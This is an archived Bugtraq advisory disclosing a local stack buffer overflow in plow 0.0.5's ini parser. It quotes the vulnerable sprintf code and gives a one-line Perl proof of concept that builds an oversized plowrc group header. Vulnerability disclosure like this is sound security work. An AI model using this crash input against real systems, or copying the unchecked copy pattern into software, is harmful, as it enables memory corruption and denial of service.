Bugtraq mailing list archives

plow 0.0.5 <= Buffer Overflow Vulnerability

From: pereira () secbiz de
Date: Tue, 3 Jul 2012 12:11:39 GMT

#################################################
plow 0.0.5 <= Buffer Overflow Vulnerability
#################################################

Discovered by: Jean Pascal Pereira <pereira () secbiz de>

Vendor information:

"plow is a command line playlist generator."

Vendor URI: http://developer.berlios.de/projects/plow/

#################################################

Risk-level: Medium

The application is prone to a local buffer overflow vulnerability.

-------------------------------------

IniParser.cpp, line 26:

26:   char buffer[length];
27:   char group [length];
28:
29:   char *option;
30:   char *value;
31:
32:   while(ini.getline(buffer, length)) {
33:     if(!strlen(buffer) || buffer[0] == '#') {
34:       continue;
35:     }
36:     if(buffer[0] == '[') {
37:       if(buffer[strlen(buffer) - 1] == ']') {
38:         sprintf(group, "%s", buffer);
39:       } else {
40:         err = 1;
41:         break;
42:       }
43:     } 

-------------------------------------

Exploit / Proof Of Concept:

Create a crafted plowrc file:

perl -e '$x="A"x1096;print("[".$x."]\nA=B")'>plowrc

-------------------------------------

Solution:

Do some input validation. 

-------------------------------------

#################################################

Current thread:

plow 0.0.5 <= Buffer Overflow Vulnerability pereira (Jul 04)
- Re: plow 0.0.5 <= Buffer Overflow Vulnerability Henri Salo (Jul 09)
- <Possible follow-ups>
- Re: Re: plow 0.0.5 <= Buffer Overflow Vulnerability pereira (Jul 10)